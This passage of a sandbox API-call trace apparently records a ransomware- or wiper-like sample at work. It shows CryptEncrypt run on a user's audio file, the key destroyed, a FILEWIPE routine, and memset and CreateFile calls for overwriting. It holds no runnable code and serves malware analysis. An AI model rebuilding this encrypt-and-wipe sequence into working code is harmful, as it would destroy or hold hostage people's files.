out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.628] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.629] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.629] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.629] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.630] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.630] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.630] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.630] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.630] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.630] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.630] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.630] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.630] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.630] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.630] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.630] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.630] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.630] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.630] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.631] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x77bb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x77c0) returned 1 [0184.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.631] CharLowerBuffW (in: lpsz="byte[30657]", cchLength=0xb | out: lpsz="byte[30657]") returned 0xb [0184.631] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.633] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.633] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.633] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc00770*, pdwDataLen=0x87e820*=0x77bb, dwBufLen=0x77c0 | out: pbData=0xc00770*, pdwDataLen=0x87e820*=0x77c0) returned 1 [0184.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.634] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.637] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.637] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.637] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.637] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.637] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.637] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.637] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.637] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.638] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.642] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.642] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.642] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.648] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.648] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.648] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0184.648] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.648] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0184.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.648] CryptDestroyKey (hKey=0x90af98) returned 1 [0184.649] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.649] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.649] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.649] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.649] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0184.649] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0184.649] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.649] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0184.649] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.649] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0184.649] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.649] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0184.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.649] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.649] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.650] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.650] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.650] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.650] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0184.650] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.650] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.650] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.650] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.650] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0184.650] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.650] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0184.650] FreeLibrary (hLibModule=0x74f20000) returned 1 [0184.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.651] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.651] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.652] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.655] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.655] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0184.656] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.656] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.656] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b7f0, ftCreationTime.dwHighDateTime=0x1d5e216, ftLastAccessTime.dwLowDateTime=0x8a4c7a00, ftLastAccessTime.dwHighDateTime=0x1d5da34, ftLastWriteTime.dwLowDateTime=0x8a4c7a00, ftLastWriteTime.dwHighDateTime=0x1d5da34, nFileSizeHigh=0x0, nFileSizeLow=0x77bb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LfTuLY5i.wav", cAlternateFileName="")) returned 0x90ae18 [0184.656] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0184.657] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.657] CharLowerBuffW (in: lpsz="byte[30651]", cchLength=0xb | out: lpsz="byte[30651]") returned 0xb [0184.658] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.658] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0184.658] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.658] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0184.658] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0184.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2828 [0184.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2828, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.659] FreeLibrary (hLibModule=0x75c90000) returned 1 [0184.659] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.660] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.660] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.660] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0184.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 